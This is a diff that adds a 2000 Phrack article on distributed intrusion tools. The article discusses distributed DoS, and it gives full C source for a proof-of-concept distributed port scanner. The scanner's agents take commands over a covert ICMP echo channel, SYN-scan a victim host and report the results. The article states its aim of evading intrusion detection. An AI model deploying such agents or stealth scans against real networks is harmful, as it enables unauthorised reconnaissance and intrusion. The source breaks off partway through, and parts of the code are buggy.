+        Paxson, Network Research Group, Lawrence Berkeley National
+        Laboratory, Berkley, CA, Revised January 14, 1998, Proceedings of the
+        7th USENIX Security Symposium, San Antonio, TX, January 1998,
+        ftp://ftp.ee.lbnl.gov/papers/bro-usenix98-revised.ps.Z
+
+   [7]  Why Understanding Anything About The Internet Is Painfully Hard, Vern
+        Paxson, AT&T Center for Internet Research at ICSI, International
+        Computer Science Institute, Berkeley, CA, April 28, 1999,
+        http://www.aciri.org/vern/talks/vp-painfully-hard.UCB-mig.99.ps.gz
+
+   [8]  Insertion, Evasion, and Denial of Service: Eluding Network Intrusion
+        Detection, Thomas H. Ptacek & Timothy N. Newsham, Secure Networks,
+        Inc, January, 1998, http://www.securityfocus.com/data/library/ids.pdf
+
+   [9]  Defeating Sniffers and Intrusion Detection Systems, horizon, Phrack
+        Magazine, Volume 8, Issue 54, article 10 of 12, Dec 25th, 1998,
+        http://www.phrack.com/search.phtml?view&article=p54-10
+
+  [10]  CASL (Custom Audit Scripting Language) for Linux Red Hat 5.x,
+        Programming Guide, Version 2.0,
+        ftp://ftp.nai.com/pub/security/casl/casl20.tgz
+
+  [11]  A look at whisker's anti-IDS tactics, Rain Forest Puppy,
+        http://www.wiretrip.net/rfp/pages/whitepapers/whiskerids.html
+
+  [12]  Defending Against NIDS Evasion using Traffic Normalizers, Vern
+        Paxson, Mark Handley, ACIRI, RAID, Sept '99
+
+  [13]  IP Security Protocol (ipsec),
+        http://www.ietf.org/html.charters/ipsec-charter.html
+
+  [14]  Network Security Via Reverse Engineering of TCP Code: Vulnerability
+        Analysis and Proposed Solutions, Biswaroop Gua, Biswanath Mukherjee,
+        Biswanath Mukherjee, Department of Computer Science, University of
+        California, Davis, CA 95616, U.S.A, November 7, 1995
+
+  [15]  Trusted Solaris 7
+        http://www.sun.com/software/solaris/trustedsolaris/
+
+  [16]  I Am Right - You Are Wrong, Edward De Bono, Penguin, 1992 edition,
+        ISBN 0140126783
+
+
+
+|EOF|-------------------------------------------------------------------------|
diff --git a/phrack56/12.txt b/phrack56/12.txt
new file mode 100644
index 0000000..487707c
--- /dev/null
+++ b/phrack56/12.txt
@@ -0,0 +1,1162 @@
+                      - P H R A C K   M A G A Z I N E -
+
+                            Volume 0xa Issue 0x38
+                                  05.01.2000
+                                  0x0c[0x10]
+
+|----------------------------- DISTRIBUTED TOOLS -----------------------------|
+|-----------------------------------------------------------------------------|
+|----------------------------- sasha / lifeline ------------------------------|
+
+
+"The COAST approach has been to look at limits and underlying problems and see
+ what we can do to change the paradigm.  We don't start with the view that
+ 'well, the system gives us X and we know Y, so what can we find using that?'
+ Instead, we ask questions about the whole process of intrusion and misuse,
+ and try to find new ideas there."
+
+    - Gene Spafford
+
+
+----|  Distributed Denial of Service Attacks
+
+It is perhaps prophetic that the first CERT advisory of the 21st century
+should concern a distributed Denial of Service attack (see CA-2000-01 [1]).
+
+In November 1999, CERT even held a 'Distributed-Systems Intruder Tools
+Workshop' [2], to discuss "the threat" of distributed DoS (Denial of Service)
+tools.
+
+Briefly:  in a distributed DoS attack, daemons are installed on multiple
+compromised hosts;  a client is used to identify a target to the daemons who
+each then launch a DoS attack (usually using flood-like attacks i.e. UDP,
+ICMP, SYN).  The unified and sustained nature of attacks generated by multiple
+daemons can often cripple a target network/host.
+
+Some good work has been done on analysis of current distributed DoS tools, and
+we direct the interested reader to the work of David Dittrich [3].
+
+
+----|  Applications of a Distributed Approach
+
+It is somewhat depressing that DoS is very often the first application of any
+new idea which can be utilized in a security context, and this is especially
+true of distributed techniques, since the distributed 'philosophy' is
+applicable to many facets of computer network penetration.
+
+Below, we describe two examples of the distributed approach applied to very
+familiar tasks:  port scanning and password sniffing.  Source code for an
+example distributed port scanner implementation is included at the end of the 
+article.
+
+
+----|  Port Scanning
+
+In P55-09 - 'Distributed Information Gathering' [4], the advantages in using
+a distributed network information gathering approach are described, namely:
+
+I.    Stealth
+
+By employing co-operation, time dilation, and randomization techniques we hope
+to elude NIDS (network-based intrusion detection systems).
+
+II.   Correlation Information
+
+The acquisition of multiple 'points of view' of a target enables a more 
+complete model of the target to be constructed, including multiple route and 
+timing information.
+
+III.  Pervasive Information Gathering
+
+The countermeasures which some N-IDS can employ, such as injecting a 'deny 
+rule' into a firewall (for example, using an OPSEC API [5]), become less 
+effective at stopping ongoing information gathering.
+
+
+----|  Distributed Port Scan Detection
+
+To detect a distributed port scan in which multiple hosts are being used to
+distribute and "share the work" of information gathering, the functionality
+must exist in a detection system to analyze a recorded event (for example - a
+SYN packet sent to a port) in context, i.e. using circumstantial information.
+
+The difficulty lies in knowing which information it is valuable to keep;  you
+may throw away the one byte which unlocks the puzzle!  Resource starvation
+and state-holding attacks then become applicable, since the resources
+available to the detection system are unlikely to be infinite.
+
+Assuming no pathologically obvious variations of information gathering
+techniques are used (e.g. SYN+RST), a detection system must almost ignore
+source IP addresses when performing analysis, since by definition, multiple
+source hosts can distribute the set of probes to be performed.
+
+For example, if you receive a connect to each port from 1 to 1024 over the
+duration of a week, from multiple hosts, you are likely to have been port
+scanned;  however, the set of ports an individual is interested in determining
+are open on your machine (or network), is unlikely to be as easy to recognize
+as 1-1024.
+
+There obviously exists an opportunity to perform much more research in
+the area of programmatically identifying distributed attacks.
+
+
+----|  Password Sniffing
+
+In P55-16 - 'Distributed Metastasis' [6], the advantages associated with using
+a distributed model for password sniffing are described;  briefly, the two
+primary advantages are in removing the need to revisit a compromised host to
+collect sniffer logs, and to increase the speed with which the sniffed 
+information is made available so that the penetration can be immediately
+continued/deepened.
+
+
+----|  The Implementation
+
+An implementation of a distributed port scanner is provided for illustrative
+purposes.
+
+DPS (Distributed Port Scanner) consists of a client working in conjunction with 
+agents located on multiple remote hosts.
+
+The communication between the client and the agents is provided via some basic 
+commands encapsulated in ICMP_ECHO_REQUEST/REPLY packets, thus providing a
+fairly covert channel.  Strong data payload encryption is planned for a later
+release.
+
+The port scan request is done by the client;  the agents perform the port scan
+itself, and then report the results back to the client.
+
+Imagine that we have 4 agents, located on 4 different hosts:  'hardbitten',
+'doubt', 'ketamine' and 'neurosponge'.  Our goal is to obtain the status of 
+ports 21, 22, 23, 80 and 143 on 10.0.2.10.  The client is located on the host
+'implode' and agents.txt is a file containing a list of agents.
+
+[root@implode dps]# ./client 10.0.2.10 21-23,80,143 agents.txt eth0
+packet sent. 1 of 1
+Using device eth0
+21 iz open
+23 iz open
+80 iz open
+
+[root@implode dps]#
+
+The client distributes the "workload" (the set of ports) between the different 
+agents;  each agent scans the target host for a subset of the total ports,
+then reports the results back to the client. 
+
+This isn't by any means a finished product - it is proof-of-concept.  Planned 
+features for future releases include:  distributed password sniffing, 
+distributed remote OS detection, strong crypto, multi-threaded agents, and 
+other ideas that people have been throwing seen this project was begun.  Stay 
+tuned.  Take your time to browse through the source code.  Both Libnet and 
+Libpcap are needed by both the agent and the client.
+
+
+----|  Conclusions
+
+It is interesting to see historically the wave-like effect that exists between
+centralized and distributed computing:  mainframe, client/server, thin-client
+(such as Windows Terminal Server and the JavaStation Network Computer), etc.
+This same effect has not yet been fully witnessed in computer security (the
+Morris Worm [7] is an obvious exception).
+
+Conversely, the concept of 'remote control' is not new to security;  Loki [8],
+Back Orifice [9], and NetBus [10] all provide client/server style remote
+control functionality.
+
+To conclude, the key to the distributed 'philosophy', is the _combination_
+of the above two concepts.
+
+
+----|  References
+
+   [1]  CERT Advisory CA-2000-01 - Denial-of-Service Developments, CERT/CC and
+	FedCIRC, January 3, 2000,
+	http://www.cert.org/advisories/CA-2000-01.html
+
+   [2]  Results of the Distributed-Systems Intruder Tools Workshop,
+	Pittsburgh, Pennsylvania USA, November 2-4, 1999, Published at
+	the CERT Coordination Center, Software Engineering Institute,
+	Carnegie Mellon University, Pittsburgh, PA, 15213, December 7,
+	1999, http://www.cert.org/reports/dsit_workshop.pdf
+
+   [3]  The Dos Project's "trinoo" distributed denial of service attack tool,
+	The "Tribal Flood Network" distributed denial of service attack tool,
+	The "stacheldraht" distributed denial of service attack tool, David
+	Dittrich, University of Washington, December 31, 1999,
+	http://www.washington.edu/People/dad/
+
+   [4]  Distributed Information Gathering, hybrid, Phrack Magazine, Vol. 9,
+	Issue 55, Article 9 of 16, 09.09.99, 
+	http://www.phrack.com/search.phtml?view&article=p55-9
+
+   [5]  Check Point Open Platform for Security (OPSEC), Check Point Software
+	Technologies Ltd, 1999, http://www.opsec.com
+
+   [6]  Distributed Metastasis: A Computer Network Penetration Methodology,
+	Andrew J. Stewart, Phrack Magazine Vol. 9, Issue 55, Article 16 of 19, 
+	09.09.99, http://www.phrack.com/search.phtml?view&article=p55-16
+
+   [7]  The Internet Worm Program: An Analysis, Eugene H. Spafford, Purdue 
+	University, 1998,
+	http://www.cerias.purdue.edu/coast/archive/data/categ29.html
+
+   [8]  Project Loki, daemon9 & alhambra, Phrack Magazine Vol. 7, Issue 49, 
+	Article 06 of 19, August 1996,
+	http://www.phrack.com/search.phtml?view&article=p49-6
+
+   [9]  Back Orifice 2000, Cult of the Dead Cow, http://www.b02k.com
+
+  [10]  http://www.netbus.org
+
+
+----|  Source Code
+
+<++> p56/dps/Makefile !5f996922
+CC          =   gcc
+CFLAGS      =   -O3 -DDEBUG 
+LIBS        =   -lnet -lpcap
+CLI_OBJECTS =   source/clt_main.o source/clt_packet_injection.o  source/clt_wait.o
+AGT_OBJECTS =   source/agt_main.o source/agt_pscan.o
+DPS_OBJECTS =   source/dps_helper.o source/dps_pcap.o 
+
+.c.o:
+	$(CC) $(CFLAGS) $(DEFINES) -c $< -o $@
+
+common:         $(DPS_OBJECTS)
+
+client:         $(CLI_OBJECTS) $(DPS_OBJECTS)   
+		$(CC) $(DPS_OBJECTS) $(CLI_OBJECTS) $(LIBS) -o client 
+		strip client  
+
+agent:          $(AGT_OBJECTS) $(DPS_OBJECTS)
+		$(CC) $(DPS_OBJECTS) $(AGT_OBJECTS) $(LIBS) -o agent
+		strip agent     
+		
+	
+clean:
+	rm -f source/*.o core
+
+<-->
+<++> p56/dps/README !6dab2725
+dps 1.0
+
+dps is a distributed portscanning tool. It consists in a client working
+in conjuction with agents located in several remote hosts thus providing
+'many-to-one' and 'many-to-many' portscanning.
+
+The communication between the client and the agents is provided via some
+basic commands encapsulated in ICMP ECHO_REQUEST/ECHO_REPLY packets this way
+providing a fairly covert channel. 
+
+Data payload encryptation is also available
+using the most popular symmetric-key algorithms (except for DES due to the
+pathetic export restrictions is U.S.).
+(*not* yet implemented)
+
+The portscan request is done by the client, being the portscan itself done by 
+the agents which then report back to the client the results obtained.
+
+
+Compilation notes:
+
+1. make client
+2. make agent
+
+and that'z it!
+<-->
+<++> p56/dps/agents.txt !96b84d09
+foo
+bar
+neuro.somewieirddomain.org
+10.0.2.10
+<-->
+<++> p56/dps/localtest.txt !ea0d9aae
+127.0.0.1
+<-->
+<++> p56/dps/include/config.h !5d33c259
+#define MAGIC                   "lifeline"  /* magic string, only alphanumerical
+									   characters please. Btw, you will
+									   become an idiot if you don't change this.
+									*/
+
+#define BLOWFISH_KEY    "lifelinerox"
+
+#define MAX_HOST_SIZE   64                      /* maximum hostname size allowed */
+
+#define MAX_ICMP_PAYLOAD_SIZE   56      /* ok, this one is tricky. A maximum payload
+									   of 56 bytes is recommended is you want 
+									   the packets to seem real. But 56 may not
+									   be enough to store all the port 
+									   information, in this case the program
+									   will split up in various ICMP packets, 
+									   however in the case that the port 
+									   information may be really large it will 
+									   cause a tremendous ICMP flood in the
+									   network, so deal with it and use the 
+									   option that fits you best.                   
+									 */
+<-->
+<++> p56/dps/include/dps_pcap.h !3dca6d72
+#ifndef  DPS_PCAP
+#define  DPS_PCAP
+
+#ifdef SOLARIS
+#include "./solaris.h"
+#endif
+
+#include <pcap.h>
+
+#define  LOOPBACK_OFFSET  4
+#define  ETHERNET_OFFSET  14
+#define  SLIP_PPP_OFFSET  24
+
+char errbuf[PCAP_ERRBUF_SIZE];
+
+void
+dps_pcap_err(
+    char *,
+    char *
+);
+
+pcap_t *
+dps_pcap_prep(
+    int,
+    char *,
+	char *
+);
+
+int
+dps_pcap_datalink(
+    pcap_t *
+);
+
+void *
+dps_pcap_next(
+    pcap_t *
+);
+
+#endif  /* DPS_PCAP */
+
+/* EOF */
+<-->
+<++> p56/dps/include/prototypes.h !f50ce3e5
+#include <linux/types.h>
+
+extern char *itoa(int);
+
+struct agentnfo {
+	u_long                  address;        /* agent's IP address */
+	u_long                  victim;         /* victim's IP address */
+	char                    *ports;         /* ports to scan separated by comas(",") and minus("-"); */
+	struct agentnfo *next;          /* next agent in list, this is a linked list */ 
+};
+
+struct scannfo {
+	u_long                  victim;
+	u_long                  cli_addr;
+	char                    *ports;
+};
+
+struct sp_header {
+	char                    magic[8];
+    __u8                        plus:1,
+					res2:1,
+					res3:1,
+					res4:1,
+					res5:1,
+					res6:1,
+					res7:1,
+					res8:1; 
+};
+
+extern short int inject(struct agentnfo *, char *);
+<-->
+<++> p56/dps/include/solaris.h !acb0956b
+#ifndef SOLARIS_H
+#define SOLARIS_H
+
+#include <stdio.h>
+#include <string.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <errno.h>
+#include <ctype.h>
+#include <strings.h>
+
+#include <arpa/inet.h>
+
+#include <sys/types.h>
+#include <sys/stat.h>
+
+#include <netinet/in.h>
+#include <netinet/in_systm.h>
+#include <netinet/ip_var.h>
+#include <netinet/ip.h>
+#include <netinet/tcp.h>
+
+#endif  /* SOLARIS_H */
+
+/* EOF */
+<-->
+<++> p56/dps/source/agt_main.c  !aaf7e1ae
+#include <stdio.h>
+#include <stdlib.h>
+
+#include <pcap.h>
+
+#include <netinet/in.h>
+#include <netinet/ip.h>
+#include <netinet/tcp.h>
+#include <netinet/ip_icmp.h>
+
+#include <asm/types.h>
+
+#include "../include/config.h"
+#include "../include/prototypes.h"
+
+#define SNAPLEN 64
+#define ETHHDR  14
+
+void pkt_analyser_func(char *, char *);
+
+/* Global variables */
+unsigned int dlink_s;
+const u_char *snapend;
+
+int main(int argc, char **argv) {
+
+	pkt_analyser_func(argv[1], MAGIC);
+
+}
+
+void pkt_analyser_func(char *dev, char *magic) {
+	
+	pcap_t                          *pd;
+	char                            *data;
+	struct pcap_pkthdr      h;
+	struct iphdr            *iph;
+	char                            *payload;
+	int x;
+	struct sp_header        *head;
+	struct scannfo          *scan;
+
+	if(!dev) {
+		if(!(dev = pcap_lookupdev(NULL))) {
+			perror("pcap_lookupdev");                       
+			exit(1);
+		}               
+	}
+	printf("Using device %s\n", dev);       
+	
+	
+	pd = pcap_open_live(dev, SNAPLEN, 0, 10, NULL);
+	
+	switch(pcap_datalink(pd)) {
+	case DLT_EN10MB:
+	case DLT_IEEE802:
+		dlink_s = ETHHDR;
+		break;
+	case DLT_NULL:
+		dlink_s = 4;
+		break;
+	default:
+		perror("unknown datalink header");
+		exit(0);
+		break;
+	}                               
+	
+	for(;;) {
+		data = pcap_next(pd, &h);       
+
+		iph = (struct iphdr *)(data + dlink_s);
+
+		if(iph->protocol == IPPROTO_ICMP) {
+			struct icmphdr *icmph = (struct icmphdr *)(data + dlink_s + iph->ihl*4);
+			if(icmph->type == 8 && icmph->code == 0) {
+				
+				payload = malloc(MAX_ICMP_PAYLOAD_SIZE);
+				memcpy(payload, data + dlink_s + iph->ihl*4 + 8, MAX_ICMP_PAYLOAD_SIZE);
+/*
+				for(x = 0; x <= MAX_ICMP_PAYLOAD_SIZE; x++)
+					printf("%c", *(payload+x));
+				printf("\n");
+*/                              
+				if (!(strncmp(MAGIC, payload, strlen(MAGIC)))) {
+					head = malloc(16);
+					memcpy(head, payload, 16);
+					if (!(head->plus)) {
+						scan = malloc(sizeof(struct scannfo));
+						memcpy(scan, payload + 16 + sizeof(u_long), sizeof(u_long));
+						memcpy(scan + sizeof(u_long), payload + 16, sizeof(u_long));
+						scan->ports = malloc(strlen(payload + 16 + 2*sizeof(u_long)) + 1);
+						memset(scan->ports, '\0', strlen(payload + 16 + 2*sizeof(u_long)) + 1);
+						memcpy(scan->ports, payload + 16 + 2*sizeof(u_long), strlen(payload + 16 + 2*sizeof(u_long)));          
+						pscan(scan, pd, dev);           
+
+
+					}               
+			
+
+				}
+			}                                                       
+		}
+	}
+
+
+
+}
+<-->
+<++> p56/dps/source/agt_pscan.c !6b34db79
+#include <libnet.h>
+#include <pcap.h>
+
+#include "../include/prototypes.h"
+#include "../include/config.h"
+
+#define SNAPLEN 64
+#define ETHHDR  14
+
+int pscan(struct scannfo *scan, pcap_t *pd, char *dev) {
+	
+	extern unsigned int dlink_s;
+	int i, timeout = 10;
+	char    *port, *ebuf;
+	int c, sock;
+	char *buf;
+	u_long src_ip, dst_ip;
+	int p;
+	u_char *data;
+	struct iphdr *iph;
+	struct tcphdr *tcph;
+	struct pcap_pkthdr h;
+	time_t utime;
+
+	srandom(time(NULL));
+	
+	if(!(buf = malloc(IP_MAXPACKET))) {
+		return 0;
+	}               
+
+	if(!(sock = open_raw_sock(IPPROTO_RAW))) {
+		return 0;
+	}               
+	src_ip = htonl(get_ipaddr(NULL, dev, ebuf)); 
+	dst_ip = scan->victim;
+
+	libnet_build_ip(TCP_H, 0, random() % 65536, 0, 64, IPPROTO_TCP, 
+					src_ip, dst_ip, NULL, 0, buf);
+
+
+//      sleep(2);
+
+	port = strtok(scan->ports, ",");
+	p = atoi(port);
+
+	while (port) {
+	
+		libnet_build_tcp(1030, p, 11111, 99999, TH_SYN, 
+						 1024, 0, NULL, 0, buf + IP_H);
+
+		libnet_do_checksum(buf, IPPROTO_TCP, TCP_H);
+
+		c = libnet_write_ip(sock, buf, TCP_H + IP_H);
+	
+//              sleep(2);
+		i = 1;
+		utime = time(NULL);
+		while ((time(NULL) - utime) <= timeout && i) {
+			data = (u_char *)pcap_next(pd, &h);
+			iph = (struct iphdr *)(data + dlink_s);
+			if (iph->saddr == dst_ip && iph->daddr == src_ip) {
+				if (iph->protocol == IPPROTO_TCP) {
+					tcph = (struct tcphdr *)(data + dlink_s + iph->ihl*4);
+					if (tcph->th_sport == htons(p) && tcph->th_dport == htons(1030)) { 
+						if ((tcph->th_flags & (TH_SYN|TH_ACK)) == (TH_SYN|TH_ACK)) { send_result(p, scan->cli_addr); }
+//                                              if (tcph->th_flags & TH_RST)printf("%d it'z closed\n", p);
+						i = 0; 
+					}       
+				}               
+			}                       
+		}
+	
+	port = strtok('\0', ",");
+	if(!port) return 0;
+	p = atoi(port);
+
+	}
+	free(buf);
+	return 1;
+}
+
+int send_result(int p, u_long dst_ip) {
+
+	char    *buf;
+	int     c, sock;
+	u_long  src_ip;
+
+
+	src_ip = libnet_name_resolve("127.0.0.1", 1);
+
+	if(!(sock = open_raw_sock(IPPROTO_RAW))) {
+		return 0;
+	}               
+	buf = malloc(IP_MAXPACKET);
+	memset(buf, '\0', IP_MAXPACKET);
+
+	libnet_build_ip(ICMP_ECHO_H + sizeof(int) + strlen(MAGIC),
+		    0,
+		    random() % 65535,
+		    0,
+		    32,
+		    IPPROTO_ICMP,
+		    src_ip,
+		    dst_ip,
+		    NULL,
+		    0,
+		    buf);
+
+    libnet_build_icmp_echo(ICMP_ECHO, 0, 440, 1, NULL, 0, buf + IP_H);
+
+	memcpy(buf + IP_H + ICMP_ECHO_H, "araiarai", strlen(MAGIC));
+	memcpy(buf + IP_H + ICMP_ECHO_H + strlen(MAGIC), &p, sizeof(int));
+
+    if (libnet_do_checksum(buf, IPPROTO_ICMP, ICMP_ECHO_H + strlen(MAGIC) + sizeof(int)) == -1) {
+		return -1;
+    }
+
+
+    c = libnet_write_ip(sock, buf, ICMP_ECHO_H + IP_H + strlen(MAGIC) + sizeof(int));
+    if (c < ICMP_ECHO_H + IP_H + strlen(MAGIC) + sizeof(int)) {
+//       printf("Error writing to network\n");
+       return -1;
+    }
+	
+//      printf("wrote %d bytes.\n", c);
+
+	return 1;               
+	
+}
+<-->
+<++> p56/dps/source/clt_main.c !6b6e9348
+#include <stdio.h>
+#include <string.h>
+#include <stdlib.h>
+#include "../include/config.h"
+#include "../include/prototypes.h"
+
+void usage(char *);
+
+int main(int argc, char **argv) {
+	
+	int                             x, round;
+	FILE                            *agentsfd;
+	struct agentnfo         *agent, *first_agent;
+	char                            *temp, *ports;  
+	u_char                          buf2[MAX_HOST_SIZE], *buf3;
+	u_long                          address;
+	u_short                         begin_port, end_port;
+	char                            *sequence;
+
+
+	if (getuid() || geteuid()) {
+		fprintf(stderr, "You need to be root to run dps.\n");
+		exit(0);
+	}
+
+	if (argc != 5) usage(argv[0]);                          
+
+	if ((agentsfd = fopen(argv[3], "r")) == NULL) {
+		fprintf(stderr, "Error opening %s.\n", argv[3]);
+		exit(0);
+	}               
+
+	round = 0;
+
+	while ((fgets(buf2, MAX_HOST_SIZE, agentsfd)) != NULL) {  
+		
+		buf3 = malloc(strlen(buf2));
+		memset(buf3, '\0', strlen(buf2));
+		memcpy(buf3, buf2, strlen(buf2) - 1);
+	
+		if ((address = libnet_name_resolve(buf3, 1)) == -1) {
+			fprintf(stderr, "Error resolving %s\n", buf3);
+			fclose(agentsfd);
+			exit(0);
+		}
+		
+		free(buf3);
+
+		if (!round)     {       
+			agent = malloc(sizeof(struct agentnfo));
+			first_agent = agent;
+			round = 1;
+		}
+		else {
+			agent->next = malloc(sizeof(struct agentnfo)); 
+			agent = agent->next;
+		}
+
+		memcpy((struct agentnfo *)agent, &address, sizeof(u_long));
+
+		agent->victim = libnet_name_resolve(argv[1], 1);
+
+		agent->ports = NULL;
+
+		agent->next = NULL;
+
+	}
+	
+	fclose(agentsfd);
+
+
+	agent = first_agent;    
+	ports = strtok(argv[2], ",");
+	if (strrchr(ports, '-')) {
+		if (strchr(ports, '-')) {
+			sequence = malloc(strchr(ports, '-') - ports);
+			memcpy(sequence, ports, strchr(ports, '-') - ports);
+			begin_port = atoi(sequence);
+			sequence = malloc(strlen(ports) - (strchr(ports, '-')-ports));
+			memcpy(sequence, strchr(ports, '-') + 1, strlen(ports) - (strchr(ports, '-')-ports));
+			end_port = atoi(sequence); 
+			for (x = begin_port ; x <= end_port ; x++) {
+				if (agent->next == NULL || x == begin_port) {                                   
+					agent = first_agent;
+				}
+				else
+					agent = agent->next;
+				if (agent->ports == NULL) {
+					agent->ports = malloc(strlen(ports) + 2);
+					memset(agent->ports, '\0', strlen(ports) + 2);
+				}
+				else {
+					temp = malloc(strlen(agent->ports) + strlen(ports) + 2);
+					memset(temp, '\0', strlen(agent->ports) + strlen(ports) + 2);
+					memcpy(temp, agent->ports, strlen(agent->ports));
+					free(agent->ports);
+					agent->ports = temp;
+				}
+				memcpy(agent->ports + strlen(agent->ports), itoa(x), strlen(ports));
+				memcpy(agent->ports + strlen(agent->ports), ",", 1);
+			}
+		}
+	}
+	else {
+		agent->ports = malloc(strlen(ports) + 2);
+		memset(agent->ports, '\0', strlen(ports) + 2);
+		memcpy(agent->ports, ports, strlen(ports));
+		memcpy(agent->ports + strlen(ports), ",", 1);
+	}
+	while (ports) {
+		ports = strtok('\0', ",");
+		if (ports) { 
+			if (strchr(ports, '-')) {
+				seq:
+				sequence = malloc(strchr(ports, '-') - ports);
+				memcpy(sequence, ports, strchr(ports, '-') - ports);
+				begin_port = atoi(sequence);
+				sequence = malloc(strlen(ports) - (strchr(ports, '-')-ports));
+				memcpy(sequence, strchr(ports, '-') + 1, strlen(ports) - (strchr(ports, '-')-ports));
+				end_port = atoi(sequence); 
+				for (x = begin_port ; x <= end_port ; x++) {
+					if (agent->next == NULL)                                        
+						agent = first_agent;
+					else
+						agent = agent->next;
+					if (agent->ports == NULL) {
+						agent->ports = malloc(strlen(ports) + 2);
+						memset(agent->ports, '\0', strlen(ports) + 2);
+					}
+					else {
+						temp = malloc(strlen(agent->ports) + strlen(ports) + 2);
+						memset(temp, '\0', strlen(agent->ports) + strlen(ports) + 2);
+						memcpy(temp, agent->ports, strlen(agent->ports));
+						free(agent->ports);
+						agent->ports = temp;
+					}
+					memcpy(agent->ports + strlen(agent->ports), itoa(x), strlen(ports));
+					memcpy(agent->ports + strlen(agent->ports), ",", 1);
+				}
+				
+
+
+			}
+			else {
+				if (agent->next == NULL) 
+					agent = first_agent;
+				else 
+					agent = agent->next;
+				if (agent->ports == NULL) { 
+				    agent->ports = malloc(strlen(ports) + 2);
+					memset(agent->ports, '\0', strlen(ports) + 2);
+				}
+				else {
+					temp = malloc(strlen(agent->ports) + strlen(ports) + 2);
+					memset(temp, '\0', strlen(agent->ports) + strlen(ports) + 2);
+					memcpy(temp, agent->ports, strlen(agent->ports));
+					free(agent->ports);
+					agent->ports = temp;
+				}
+				memcpy(agent->ports + strlen(agent->ports), ports, strlen(ports));
+				memcpy(agent->ports + strlen(agent->ports), ",", 1);
+			}
+		}
+	}
+#ifdef DEBUG
+	for (agent = first_agent; agent != NULL; agent = agent->next) {
+		printf("%ld -> %s\t%p\t%ld\n", agent->address, agent->ports, agent->ports, agent->victim);
+	}
+#endif
+printf("elite\n");      
+//      free(temp);
+//      free(sequence);
+printf("ultra-elite\n");
+	if(inject(first_agent, argv[4]) != 1) {
+		printf("Error in packet injection\n");
+	}
+
+	wait_results(argv[4]);
+
+	exit(1);
+
+}
+
+void usage(char *exec) {
+	printf("dps - lifeline <lifeline@against.org>\n");
+	printf("%s <target_host> <ports to scan> <agents file> <device>\n", exec);
+	exit(1);
+}                                                                                                                               
+<-->
+<++> p56/dps/source/clt_packet_injection.c !cbbedc0d
+#include <libnet.h>
+#include "../include/config.h"
+#include "../include/prototypes.h"
+
+#define MAGIC   "lifeline"
+#define AGENT   "doubt"
+#define SOURCE  "hardbitten"
+
+/*
+ *
+ * Packet injection routines. 
+ * 
+ */
+short int inject (struct agentnfo *first_agent, char *dev) {
+
+	struct agentnfo *agent;
+	struct sp_header *head;
+	int                     sock, x, c, offset, y;
+	unsigned int    each_p, info_s, packets_n;
+	char                    *pload, *buf, *ebuf;    
+	u_long                  src_ip, dst_ip, cli_addr;
+
+
+	cli_addr = src_ip = htonl(get_ipaddr(NULL, dev, ebuf));
+
+	/* dps control header construction */
+	head = malloc(16);
+	memset(head, '\0', 16); 
+	memcpy(head, &MAGIC, 8);/* MAGIC string should be no longer than 8 chars */
+
+
+	sock = libnet_open_raw_sock(IPPROTO_RAW);
+	if (sock == -1) return -1;
+
+	for (agent = first_agent ; agent != NULL ; agent = agent->next) {
+		/* 
+		 * First let'z take care of our special payload. 
+		 *
+	 * -------------------------
+	 * | MAGIC |+|R|R|R|R|R|R|R|
+		 * -------------------------------------        
+		 * cli_addr | victim_addr | ports_info |
+		 * -------------------------------------
+		 */     
+
+		/* Space available in each packet */
+		each_p = MAX_ICMP_PAYLOAD_SIZE - 16;
+	
+		/* Total information size */    
+		info_s = 2*sizeof(u_long) + strlen(agent->ports);
+
+		/* Calculate the number of packets needed for all the info. */
+		packets_n = (info_s % each_p ? info_s / each_p + 1 : info_s / each_p);
+
+
+		/* Allocate memory */
+		pload = malloc(MAX_ICMP_PAYLOAD_SIZE + 1);
+		memset(pload, '\0', MAX_ICMP_PAYLOAD_SIZE + 1);
+
+		buf = malloc(IP_H + ICMP_ECHO_H + MAX_ICMP_PAYLOAD_SIZE + 1);
+		memset(buf, '\0', IP_H + ICMP_ECHO_H + MAX_ICMP_PAYLOAD_SIZE + 1);
+
+		dst_ip = agent->address;
+
+		libnet_build_ip(MAX_ICMP_PAYLOAD_SIZE,
+						0,
+						random() % 65535,
+						0,
+						32,
+						IPPROTO_ICMP,
+						src_ip,
+						dst_ip,
+						NULL,
+						0,
+						buf);
+
+
+		offset = 0;     
+		for (x = 1 ; x <= packets_n ; x++) {
+
+			if (x < packets_n) { 
+				head->plus = 1;
+				memset(pload, '\0', MAX_ICMP_PAYLOAD_SIZE + 1); 
+				memcpy(pload, head, 16);
+				memcpy(pload + 16, agent->ports + offset, MAX_ICMP_PAYLOAD_SIZE - 16);
+//                              memcpy(pload + 16, agent->ports + offset, strlen(agent->ports));
+				offset =+ (MAX_ICMP_PAYLOAD_SIZE - 16);
+			}
+			else {
+				head->plus = 0;
+				memset(pload, '\0', MAX_ICMP_PAYLOAD_SIZE + 1); 
+				memcpy(pload, head, 16);
+				memcpy(pload + 16, &cli_addr, sizeof(u_long));
+				memcpy(pload + 16 + sizeof(u_long), &(agent->victim), sizeof(u_long));
+				memcpy(pload + 16 + 2*sizeof(u_long), agent->ports + offset, strlen(agent->ports));
+//                              memset(pload + 16 + 2*sizeof(u_long) + strlen(agent->ports + offset), 'A', MAX_ICMP_PAYLOAD_SIZE - (16 + 2*sizeof(u_long) + strlen(agent->ports + offset))); 
+
+			} 
+
+			libnet_build_icmp_echo(ICMP_ECHO, 0, 440, 1, NULL, 0, buf + IP_H);
+			
+			memset(buf + IP_H + ICMP_ECHO_H, '\0', MAX_ICMP_PAYLOAD_SIZE + 1);
+			memcpy(buf + IP_H + ICMP_ECHO_H, pload, MAX_ICMP_PAYLOAD_SIZE);
+
+			if (libnet_do_checksum(buf, IPPROTO_ICMP, ICMP_ECHO_H + MAX_ICMP_PAYLOAD_SIZE) == -1) {
+				return -1;
+			}       
+
+/*
+			for (y = 0 ; y <= 64 ; y++)     
+				printf("%c", *(buf + 28 + y));
+			printf("\n");
+*/
+			c = libnet_write_ip(sock, buf, ICMP_ECHO_H + IP_H + MAX_ICMP_PAYLOAD_SIZE);
+			if (c < ICMP_ECHO_H + IP_H + MAX_ICMP_PAYLOAD_SIZE) {
+				printf("Error writing to network\n");
+				return -1;
+			}
+			printf("packet sent. %d of %d\n", x, packets_n);
+
+		}
+		
+	}
+
+	free(buf);
+	return 1;
+
+}
+<-->
+<++> p56/dps/source/clt_wait.c !cd679af6
+#include <stdio.h>
+#include <stdlib.h>
+
+#include <pcap.h>
+
+#include <netinet/in.h>
